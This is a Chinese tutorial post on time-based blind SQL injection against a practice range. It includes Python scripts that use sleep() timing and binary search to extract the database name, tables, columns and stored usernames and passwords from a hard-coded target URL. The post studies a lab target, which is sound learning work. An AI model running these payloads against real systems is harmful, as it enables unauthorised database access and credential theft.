SQL注入漏洞 | sleep型

news2025/1/11 6:56:42

文章目录

    • 前言
    • MySQL sleep型
      • 测试
      • 数据库名长度
      • 数据库名
      • 表名
      • 列名
      • 字段值
      • 总脚本文件

前言


  • SQL注入漏洞 | bool型

  • if(SQL语句,sleep(),null)
    在这里插入图片描述

  • if()、sleep()的使用

    select * from table where id=1 and sleep(2)  
    //执行查询id=1,同时sleep(2)。浏览器显示数据库返回的结果时有较长的时间延迟
    
    select * from table where id=1 and if(1,sleep(2),0)  
    //执行查询id=1,同时因为if的条件为1,所以执行sleep(2),返回结果有时间延迟
    
    select * from table where id=1 and if(0,sleep(2),0)  
    //执行查询id=1,同时因为if的条件为0,所以执行0,返回结果没有时间延迟
    
  • 总结:一边用靶场复现,一边写复现文章,前后用了3小时,写一篇文章真的耗时间。

MySQL sleep型


测试

  1. 好久没用了,需要重新启动靶场
    在这里插入图片描述

  2. 随便测试一下,发现不会把查询结果返回,而且无论错对,返回的东西都一样,因此也无法利用bool型注入
    在这里插入图片描述
    在这里插入图片描述

  3. 使用一下sleep()函数,观察是否有时间延迟
    在这里插入图片描述

    在这里插入图片描述

  4. 有时间延迟,说明sleep(2)放进数据库执行了,导致返回结果延迟,因此这里有SQL注入点。
    在这里插入图片描述

  5. 因此我们可以利用是否有时间延迟来判断if的条件是否为真。

数据库名长度

  1. ?id=1 and if(length(database())=1,sleep(4),0),我们可以一个一个猜测,假设length(database())=1,观察有没有时间延迟,没有的话说明我们猜错了,继续猜。猜到7的时候,观察到时间延迟了,说明我们猜对了。
    length(database())=3

  2. 重复的工作可以用脚本,顺便锻炼一下写exp的能力。

    import time
    import requests
    
    url = "http://8.134.148.36:8001/sqli/04.php"
    
    def DBlen():
        for i in range(20):
            payload = url + "?id=1 and if(length(database())={},sleep(4),0)".format(i)
            start_time = time.time()  # 记录开始时间
            response = requests.get(url=payload)
            space_time = time.time() - start_time  # 时间间隔
            if space_time >= 4:
                print("数据名长度为", i)
                return i
    

    在这里插入图片描述

数据库名

  1. 现在知道了数据库名的长度,下一步可以猜测数据库名。一位一位的猜测,猜测database的第一位为a,转换成ASCII码为97ord(mid((select database()),1,1))=97
    在这里插入图片描述

  2. 脚本

    def DBname():
        result = ""
        for i in range(20):
            l = 32
            r = 130
            mid = (l + r) >> 1
            while (l < r):
                payload = url + "?id=1 and if(ord(mid((select database()),{},1))>{},sleep(2),0)".format(i, mid)
                start_time = time.time()  # 记录开始时间
                response = requests.get(url=payload)
                space_time = time.time() - start_time  # 时间间隔
                if space_time >= 2:
                    l = mid + 1
                else:
                    r = mid
                mid = (l + r) >> 1
            result = result + chr(mid)
            print("数据库名为", result)
    
  3. sleep(4)太久了,我改成sleep(2),减少一下时间,整个过程有点久,多点的耐心。
    在这里插入图片描述

表名

  1. 下一步,就是找数据库iwebsec下的所有表。这是查询表名
    ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=95

  2. 脚本

    def DBtable():
        result = ""
        for i in range(30):
            l = 32
            r = 130
            mid = (l + r) >> 1
            while (l < r):
                payload = url + "?id=1 and if(ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(2),0)".format(
                    i, mid)
                start_time = time.time()  # 记录开始时间
                response = requests.get(url=payload)
                space_time = time.time() - start_time  # 时间间隔
                if space_time >= 2:
                    l = mid + 1
                else:
                    r = mid
                mid = (l + r) >> 1
            result = result + chr(mid)
            print("数据库名的表名为", result)
    

    在这里插入图片描述

列名

  1. 上面已经知道了数据库有哪些表,现在测一下某个表下有哪些列(字段)。以user表为例子:

    def DBcolumn():
        result = ""
        for i in range(30):
            l = 32
            r = 130
            mid = (l + r) >> 1
            while (l < r):
                payload = url + "?id=1 and if(ord(mid((select group_concat(column_name) from information_schema.columns where table_name='user'),{},1))>{},sleep(2),0)".format(
                    i, mid)
                start_time = time.time()  # 记录开始时间
                response = requests.get(url=payload)
                space_time = time.time() - start_time  # 时间间隔
                if space_time >= 2:
                    l = mid + 1
                else:
                    r = mid
                mid = (l + r) >> 1
            result = result + chr(mid)
            print("数据库名的表的列为", result)
    
  2. 结果
    在这里插入图片描述

字段值

  1. 上面我们知道了user表有3个字段,分别为idusernamepassword,现在我们猜测一下这三个字段分别都有哪些值。

    def Getdata():
        result = ""
        for i in range(100):
            l = 32
            r = 130
            mid = (l + r) >> 1
            while (l < r):
                payload = url + "?id=1 and if(ord(mid((select group_concat(id,'--',username,'--',password,'--') from user),{},1))>{},sleep(2),0)".format(
                    i, mid)
                start_time = time.time()  # 记录开始时间
                response = requests.get(url=payload)
                space_time = time.time() - start_time  # 时间间隔
                if space_time >= 2:
                    l = mid + 1
                else:
                    r = mid
                mid = (l + r) >> 1
            result = result + chr(mid)
            print("数据库名的表的列为", result)
    
  2. 结果
    在这里插入图片描述

总脚本文件

https://pan.baidu.com/s/1ct7E8YKbaI8YksXVhHG7ig?pwd=qtog 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/75287.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MyBatis Mapper四步走

1. 定义承载结果的Java类充当领域对象&#xff08;不使用MyBatis的内置map&#xff09;。 2.开发Mapper组件&#xff0c;也就是接口XML&#xff08;或注解&#xff09; 3.获取SqlSession&#xff0c;在获取Mapper组件对象。 4.调用Mapper组件的方法操作数据库。 ----------…

CSDN客诉周报第13期|修复3个重大bug,解决10个次要bug,采纳1个用户建议

听用户心声&#xff0c;解用户之需。hello&#xff0c;大家好&#xff0c;这里是《CSDN客诉周报》第13期&#xff0c;接下来就请大家一同回顾我们最近几周解决的bug&#xff5e; 一、重大问题 1、【数据中台】搜索功能失效&#xff0c;无法搜出内容 反馈量&#xff1a;300 …

Linux下的进程类别(内核线程、轻量级进程和用户进程)以及其创建方式

【推荐阅读】 需要多久才能看完linux内核源码&#xff1f; 手把手教你如何编写一个Makefile文件 了解ixgbe网卡驱动— 驱动注册&#xff08;纯代码分享&#xff09; 关于如何快速学好&#xff0c;学懂Linux内核。内含学习路线 Linux内核CPU调度域内容讲解 Linux进程类别 虽然我…

图像处理之《基于生成对抗网络和梯度下降逼近的鲁棒无覆盖隐写术》论文精读

一、相关知识 1、图像隐写术分类 本文对图像隐写术又做了新的分类&#xff0c;可以分为传统图像隐写术、无载体图像隐写术和基于深度学习的图像隐写术。 本文又将基于深度学习的图像隐写术又分为四种&#xff1a;基于嵌入的方法(即将传统的隐写术如LSB与生成模型相结合&…

clickhouse doris 实时OLAP数据库的对比与选型

背景介绍 ClickHouse 是俄罗斯的搜索公司 Yandex 开源的 MPP 架构的分析引擎&#xff0c;号称比事务数据库快 100-1000 倍&#xff0c;团队有计算机体系结构的大牛&#xff0c;最大的特色是高性能的向量化执行引擎&#xff0c;而且功能丰富、可靠性高。 Apache Doris 是由百度…

【SpringBoot图书馆管理系统项目开发教程 1 】项目规划和启动

&#x1f466; 作者简介&#xff1a;码上言 &#x1f947;代表教程&#xff1a; 1、Spring Boot vue-element 开发个人博客项目实战教程 2、基于SpringBoot智能图书馆管理系统项目开发教程 &#x1f4d4;我的文档网站&#xff1a;http://xyhwh-nav.cn/ 基于SpringBoot Vue 的…

Python xlwings模块

一 xlwings安装与功能介绍 使用特定模块前&#xff0c;需要在程序最前面进行模块导入,和JAVA导入依赖包一样。 import 模块名 也可以加上from语句导入特定的子模块(主要是防止某些模块太大影响加载速度&#xff09; from 模块名 import 函数名(也可以用*代表所有) 1.1 os模块 o…

终极 Microsoft 365 管理工具——M365 Manager Plus

由于疫情原因&#xff0c;我们的工作方式也发生了很大的改变&#xff0c;相比以往的办公方式&#xff0c;未来线上远程办公将成为一种全新的方式。但目前对于很多企业来说&#xff0c;施行线上办公模式还面临着很多困难。Microsoft 365是企业最普遍选择的基于云的工作组件&…

文件上传漏洞之upload-labs靶场实战通关

目录 pass-01 pass-02 pass-03 pass-04 pass-06 pass-07 pass-08 pass-09 pass-10 pass-11 pass-12 pass-13 pass-14 pass-15 pass-16 pass-17 pass-18 pass-19 pass-20 pass-21 pass-01 pass-02 前端删除完验证函数后通过burp修改 content-type的类型 pa…

web前端 html+css+javascript 绿色的随行旅游网页设计实例 企业网站制作

&#x1f468;‍&#x1f393;学生HTML静态网页基础水平制作&#x1f469;‍&#x1f393;&#xff0c;页面排版干净简洁。使用HTMLCSS页面布局设计,web大学生网页设计作业源码&#xff0c;这是一个不错的旅游网页制作&#xff0c;画面精明&#xff0c;排版整洁&#xff0c;内容…

Span抽取和元学习能碰撞出怎样的新火花,小样本实体识别来告诉你!

近日&#xff0c;阿里云机器学习平台PAI与华东师范大学高明教授团队、达摩院机器智能技术NLP团队合作在自然语言处理顶级会议EMNLP2022上发表基于Span和元学习的小样本实体识别算法SpanProto。这是一种面向命名实体识别的小样本学习算法&#xff0c;采用两阶段的训练方法&#…

Java StringBuilder

JavaStringBuilder\huge{Java \space StringBuilder}Java StringBuilder 概述 StringBuilderStringBuilderStringBuilder类是一种特殊的可变字符串的操作类&#xff0c;可以把它看做成一种特殊的对象容器。(简单讲的话就是一种特殊的字符串类型) 为什么要使用它&#xff1f; …

1、Spring简介与基于XML的IoC装配

一、Sping简介 1、概述 1、Spring是一个轻量级Java开发框架&#xff0c;最早有Rod Johnson创建&#xff0c;目的是为了解决企业级应用开发的业务逻辑层和其他各层的耦合问题。 2、Spring是一个面向对象设计层面的开发框架&#xff08;基本上都是运行在后台&#xff09;&#x…

从入门到进阶,KingbaseES数据库学习资料整理(持续归档中...)

一、安装和卸载 1.安装包 2.安装&卸载 3.安装、移除组件 4.license 5.安装问题 二、系统管理 1.初始化 2.数据库 3.快速开发管理工具 三、应用开发 1.sql 2.plsql 3.扩展和插件 4.接口 四、迁移 1.初始化和配置 2.迁移数据 3.迁移对象 4.迁移的异常处…

Linux网络原理与编程(2)——第十二节 应用层协议(以HTTP为例)

目录 协议 HTTP协议 认识URL HTTP协议的特征 HTTP的构成及报文格式 报文格式 请求方法 常见的Header 状态码 Cookie 我们从本节开始&#xff0c;就来正式地详细介绍网络各个层次的内容。 我们先从最顶端的应用层协议说起。 在说应用层协议之前&#xff0c;我们来思考…

Day42——Dp专题

文章目录五、多重背包六、背包问题总结动规五部曲背包递推公式遍历顺序18.打家劫舍19.打家劫舍II20.打家劫舍 III&#xff08;dfs缓存/树形DP&#xff09;五、多重背包 对于多重背包&#xff0c;我在力扣上还没发现对应的题目&#xff0c;所以这里就做一下简单介绍&#xff0c…

【SpringMVC】上篇,超详细的教程带你学会SpringMVC

✅作者简介&#xff1a;热爱Java后端开发的一名学习者&#xff0c;大家可以跟我一起讨论各种问题喔。 &#x1f34e;个人主页&#xff1a;Hhzzy99 &#x1f34a;个人信条&#xff1a;坚持就是胜利&#xff01; &#x1f49e;当前专栏&#xff1a;【Spring】 &#x1f96d;本文内…

java面向对象----抽象类

目录 抽象类与抽象方法 概念 抽象类应用 接 口 概念 接口的特点&#xff1a; 接口应用举例 Java 8中关于接口的改进 内部类 如何声明局部内部类 局部内部类的特点 匿名内部类 总结 抽象类与抽象方法 概念 随着继承层次中一个个新子类的定义&#xff0c;类变得越…

android OTA update

可以使用系統的API來實現系統更新。分兩種更新&#xff0c;non-streaming 和 streaming。non-streaming就是把更新包下載好&#xff0c;放到本地&#xff0c;然後執行更新。而streaming是爲了你的設備內存不夠&#xff0c;不能把更新包下載下來&#xff0c;使用的&#xff0c;u…

Helm 部署 java 项目到 K8S

文章目录部署流程模板目录文件解析DeploymentServiceIngress_helpers.tplChart.yamlvalues.yaml部署命令部署流程 准备 jar 包使用 Dockerfile 构建镜像上传镜像到仓库&#xff08;Harbor&#xff09;使用 Helm 模板部署 jar 到 K8S 本文着重讲解第四步&#xff0c;如何制作 …